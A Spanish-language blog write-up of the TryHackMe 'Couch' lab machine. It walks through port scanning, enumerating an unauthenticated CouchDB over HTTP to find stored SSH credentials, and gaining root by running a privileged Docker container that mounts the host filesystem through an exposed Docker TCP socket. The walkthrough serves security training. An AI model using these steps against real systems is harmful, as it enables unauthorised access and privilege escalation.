<!DOCTYPE html><html lang="es" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="días antes"><meta name="hour-prompt" content="horas antes"><meta name="minute-prompt" content="minutos antes"><meta name="justnow-prompt" content="justo ahora"><meta name="generator" content="Jekyll v4.2.2" /><meta property="og:title" content="Couch (Try Hack Me)" /><meta name="author" content="J0lm3d0" /><meta property="og:locale" content="es" /><meta name="description" content="En este documento se recogen los pasos a seguir para la resolución de la máquina Couch de la plataforma TryHackMe. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil de resolución según la plataforma." /><meta property="og:description" content="En este documento se recogen los pasos a seguir para la resolución de la máquina Couch de la plataforma TryHackMe. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil de resolución según la plataforma." /><link rel="canonical" href="https://j0lm3d0.github.io/posts/couch-(try-hack-me)/" /><meta property="og:url" content="https://j0lm3d0.github.io/posts/couch-(try-hack-me)/" /><meta property="og:site_name" content="J0lm3d0" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-11-12T11:00:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Couch (Try Hack Me)" /><meta name="twitter:site" content="@J0lm3d0" /><meta name="twitter:creator" content="@J0lm3d0" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"J0lm3d0"},"dateModified":"2021-11-25T23:44:18+01:00","datePublished":"2021-11-12T11:00:00+01:00","description":"En este documento se recogen los pasos a seguir para la resolución de la máquina Couch de la plataforma TryHackMe. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil de resolución según la plataforma.","headline":"Couch (Try Hack Me)","mainEntityOfPage":{"@type":"WebPage","@id":"https://j0lm3d0.github.io/posts/couch-(try-hack-me)/"},"url":"https://j0lm3d0.github.io/posts/couch-(try-hack-me)/"}</script><title>Couch (Try Hack Me) | J0lm3d0</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="J0lm3d0"><meta name="application-name" content="J0lm3d0"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="es"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="https://cdna.artstation.com/p/assets/images/images/022/342/774/large/nikita-poghainyi-viber-2019-08-04-15-41-05.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">J0lm3d0</a></div><div class="site-subtitle font-italic">CTF Writeups</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>INICIO</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORÍAS</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>ETIQUETAS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>HISTÓRICO</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ACERCA DE</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/J0lm3d0" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/J0lm3d0" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a> <a href="https://www.linkedin.com/in/j0lm3d0/" aria-label="linkedin" target="_blank" rel="noopener"> <i class="fab fa-linkedin"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Inicio </a> </span> <span>Couch (Try Hack Me)</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Entrada</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Buscar..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancelar</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Couch (Try Hack Me)</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> J0lm3d0 </span> - <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="12 Nov 2021, 11:00" >12 Nov 2021<i class="unloaded">2021-11-12T11:00:00+01:00</i> </span></div><div> <span> Actualizado <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="25 Nov 2021, 17:44" >25 Nov 2021<i class="unloaded">2021-11-25T23:44:18+01:00</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="921 palabras">5 minutos de lectura</span></div></div><div class="post-content"><p>En este documento se recogen los pasos a seguir para la resolución de la máquina Couch de la plataforma TryHackMe. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil de resolución según la plataforma.</p><p><img data-proofer-ignore data-src="/assets/img/THM/Couch/machine.png" alt="Logo de la máquina" /></p><p><a href="/pdfs/Write_up_Couch.pdf">Write-up en PDF realizado mediante LaTeX</a></p><h2 id="enumeración-de-servicios-y-recopilación-de-información-sensible">Enumeración de servicios y recopilación de información sensible</h2><p>Lo primero a realizar es un escaneo de todo el rango de puertos TCP mediante la herramienta <code class="language-plaintext highlighter-rouge">Nmap</code>.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre># nmap -p- --open -T5 -n -vv 10.10.141.129

Not shown: 65182 closed ports, 351 filtered ports
Reason: 65182 resets and 351 no-responses
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 63
5984/tcp open  couchdb syn-ack ttl 63
</pre></table></code></div></div><p>Tras obtener los puertos que la máquina tiene abiertos, aplico scripts básicos de enumeración y utilizo la flag -sV para intentar conocer la versión y servicio que están ejecutando cada uno de esos puertos.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="c"># nmap -p22,5984 -sC -sV 10.10.141.129</span>

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa <span class="o">(</span>RSA<span class="o">)</span>
|   256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13:a5:2d:df:19 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 e1:6d:4d:fd:c8:00:8e:86:c2:13:2d:c7:ad:85:13:9c <span class="o">(</span>ED25519<span class="o">)</span>
5984/tcp open  http    CouchDB httpd 1.6.1 <span class="o">(</span>Erlang OTP/18<span class="o">)</span>
|_http-server-header: CouchDB/1.6.1 <span class="o">(</span>Erlang OTP/18<span class="o">)</span>
|_http-title: Site doesn<span class="s1">'t have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></pre></table></code></div></div><p>Veo que, aparte del servicio SSH, nos encontramos un servicio <code class="language-plaintext highlighter-rouge">Apache CouchDb</code>, que se trata una base de datos de documentos NoSQL de código abierto que recopila y almacena datos en documentos basados en JSON. A diferencia de las bases de datos relacionales, CouchDB utiliza un modelo de datos sin esquema, que simplifica la gestión de registros en varios dispositivos informáticos. Al detectar la versión utilizada en el escaneo, pruebo a buscar exploits mediante la herramienta <code class="language-plaintext highlighter-rouge">SearchSploit</code>, encontrando un exploit que puede aplicar en dicha versión.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre># searchsploit couchdb 1.6.1
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                                           |  Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Apache CouchDB &lt; 2.1.0 - Remote Code Execution                                                                                                                                                           | linux/webapps/44913.py
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
</pre></table></code></div></div><p>Pero, tras hacer varias pruebas, compruebo que la vulnerabilidad que explota este script está subsanada o no aplica, ya que al realizar la petición POST que ejecutaría el comando, me da una respuesta “401 Unauthorized”. Para continuar, accedo al servicio a través del navegador.</p><p><img data-proofer-ignore data-src="/assets/img/THM/Couch/mainpage.png" alt="Página principal del servidor web" /></p><p>Buscando información en internet, encuentro el siguiente <a href="https://book.hacktricks.xyz/pentesting/5984-pentesting-couchdb">artículo</a> en el que se explica como enumerar de forma manual las bases de datos de CouchDB a través de peticiones HTTP. A continuación, se ve el listado de bases de datos creadas, de las cuales las que más me llaman la atención son “_users” y “secret”.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre># curl -s -X GET http://10.10.141.129:5984/_all_dbs | jq
[
  "_replicator",
  "_users",
  "couch",
  "secret",
  "test_suite_db",
  "test_suite_db2"
]
</pre></table></code></div></div><h2 id="acceso-a-la-máquina">Acceso a la máquina</h2><p>Tras enumerar más a fondo esas 2 bases de datos, encuentro en “secret” un documento que contiene una variable “passwordbackup” con unas credenciales.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre># curl -s -X GET http://10.10.141.129:5984/secret/a1320dd69fb4570d0a3d26df4e000be7 | jq
{
  "_id": "a1320dd69fb4570d0a3d26df4e000be7",
  "_rev": "2-57b28bd986d343cacd9cb3fca0b20c46",
  "passwordbackup": "atena:t4*******N##"
}
</pre></table></code></div></div><p>Con las credenciales obtenidas, logro conectarme a la máquina por SSH y obtengo la primera flag.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>atena@ubuntu:~$ cat user.txt

THM{********_*******}
</pre></table></code></div></div><h2 id="escalada-de-privilegios">Escalada de privilegios</h2><p>Enumerando el sistema para escalar privilegios, descubro que root está ejecutando un contenedor de Docker. Además, en el histórico de “bash” había encontrado un comando en el que se ejecutaba un contenedor de Docker con privilegios.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>atena@ubuntu:~$ ps -faux

root       821  0.0  1.2 395632  6424 ?        Ssl  11:42   0:02 /usr/bin/containerd
root       827  0.0  2.6 451700 13028 ?        Ssl  11:42   0:04 /usr/bin/dockerd -H=fd:// -H=tcp://127.0.0.1:2375

atena@ubuntu:~$ cat .bash_history

docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
</pre></table></code></div></div><p>Al volver a desplegar el histórico para copiar el comando, veo que se está creando una carpeta compartida en el directorio “/mnt” del contenedor, que contendrá el directorio raíz de la máquina anfitrión. Por tanto, al acceder al contenedor como root, puedo visualizar la flag que se encuentra en la máquina “host” en la ruta “/mnt/root/root.txt”. Para conseguir una shell en la máquina anfitrión, solo tendría que, por ejemplo, asignar un permiso SUID a cualquier binario que permita obtener una shell o editar el fichero “/etc/sudoers” para que el usuario “atena”, no privilegiado, pueda ejecutar comandos como root sin proporcionar contraseña.</p><div lang="plaintext" class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>atena@ubuntu:~$ docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

/ # id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

/ # cat /mnt/root/root.txt 

THM{***_*****_******_***}
</pre></table></code></div></div><p>Además, a modo de curiosidad, explico una forma para poder ejecutar el contenedor de la máquina víctima en nuestra máquina de atacante en este caso.</p><p>Al ver el proceso de Docker en el listado de procesos, observo que emplea la flag -H, utilizada para indicar el socket del demonio (daemon) de Docker al que se debe conectar el contenedor. El daemon de Docker es capaz de comunicarse con la API de Docker a través de 3 difentes tipos de socket: “unix”, “tcp” y “fd”. En este caso, se especificaban 2 tipos, un socket “fd” y un socket “tcp” que apuntaba a la propia máquina (localhost) por el puerto 2375.</p><p>De esta forma, como cuento con credenciales para el servicio SSH, podría realizar un Local Port Forwarding de tal forma que el puerto 2375 de mi máquina reenvíase las peticiones al puerto 2375 de la máquina víctima. De esta forma, podría lanzar el contenedor de docker en mi propia máquina.</p><p><img data-proofer-ignore data-src="/assets/img/THM/Couch/lpf.png" alt="Local Port Forwarding del puerto 2375 mediante SSH" /></p><p><img data-proofer-ignore data-src="/assets/img/THM/Couch//offsecdocker.png" alt="Ejecutamos el contenedor en nuestra máquina de atacante" /></p><p>Más información en la web de <a href="https://docs.docker.com/engine/reference/commandline/dockerd/">Docker</a>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/tryhackme/'>TryHackMe</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >linux</a> <a href="/tags/couchdb/" class="post-tag no-text-decoration" >couchdb</a> <a href="/tags/docker/" class="post-tag no-text-decoration" >docker</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Compartir</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Couch (Try Hack Me) - J0lm3d0&url=https://j0lm3d0.github.io/posts/couch-(try-hack-me)/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Couch (Try Hack Me) - J0lm3d0&u=https://j0lm3d0.github.io/posts/couch-(try-hack-me)/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Couch (Try Hack Me) - J0lm3d0&url=https://j0lm3d0.github.io/posts/couch-(try-hack-me)/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink('', '¡Enlace copiado correctamente!')" data-toggle="tooltip" data-placement="top" title="Copiar enlace"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Actualizado recientemente</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/tier-0-starting-point-machines-(hack-the-box)/">Tier 0 Starting Point Machines (Hack The Box)</a><li><a href="/posts/previse-(hack-the-box)/">Previse (Hack The Box)</a><li><a href="/posts/couch-(try-hack-me)/">Couch (Try Hack Me)</a><li><a href="/posts/knife-(hack-the-box)/">Knife (Hack The Box)</a><li><a href="/posts/pentesting_shells_cheat_sheet_script/">Pentesting_Shells-Cheat_Sheet-Script</a></ul></div><div id="access-tags"> <span>Etiquetas en tendencia</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/sudo/">sudo</a> <a class="post-tag" href="/tags/cve/">cve</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/adb/">adb</a> <a class="post-tag" href="/tags/alwaysinstallelevated-privilege/">alwaysinstallelevated_privilege</a> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/android-debugger-bridge/">android_debugger_bridge</a> <a class="post-tag" href="/tags/capabilities/">capabilities</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contenidos</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Más entradas</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/thenotebook-(hack-the-box)/"><div class="card-body"> <span class="timeago small" >31 Jul 2021<i class="unloaded">2021-07-31T21:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>TheNotebook (Hack The Box)</h3><div class="text-muted small"><p> En este documento se recogen los pasos a seguir para la resolución de la máquina TheNotebook de la plataforma HackTheBox. Se trata de una máquina Linux de 64 bits, que posee una dificultad media de...</p></div></div></a></div><div class="card"> <a href="/posts/cap-(hack-the-box)/"><div class="card-body"> <span class="timeago small" > 2 Oct 2021<i class="unloaded">2021-10-02T21:00:00+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Cap (Hack The Box)</h3><div class="text-muted small"><p> En este documento se recogen los pasos a seguir para la resolución de la máquina Cap de la plataforma HackTheBox. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil de resoluc...</p></div></div></a></div><div class="card"> <a href="/posts/bountyhunter-(hack-the-box)/"><div class="card-body"> <span class="timeago small" >20 Nov 2021<i class="unloaded">2021-11-20T20:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>BountyHunter (Hack The Box)</h3><div class="text-muted small"><p> En este documento se recogen los pasos a seguir para la resolución de la máquina BountyHunter de la plataforma HackTheBox. Se trata de una máquina Linux de 64 bits, que posee una dificultad fácil d...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/explore-(hack-the-box)/" class="btn btn-outline-primary" prompt="Anterior"><p>Explore (Hack The Box)</p></a> <a href="/posts/bountyhunter-(hack-the-box)/" class="btn btn-outline-primary" prompt="Siguiente"><p>BountyHunter (Hack The Box)</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/J0lm3d0">J0lm3d0</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Etiquetas en tendencia</h4><a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/sudo/">sudo</a> <a class="post-tag" href="/tags/cve/">cve</a> <a class="post-tag" href="/tags/docker/">docker</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/adb/">adb</a> <a class="post-tag" href="/tags/alwaysinstallelevated-privilege/">alwaysinstallelevated_privilege</a> <a class="post-tag" href="/tags/android/">android</a> <a class="post-tag" href="/tags/android-debugger-bridge/">android_debugger_bridge</a> <a class="post-tag" href="/tags/capabilities/">capabilities</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://j0lm3d0.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No se han encontrado resultados.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script>
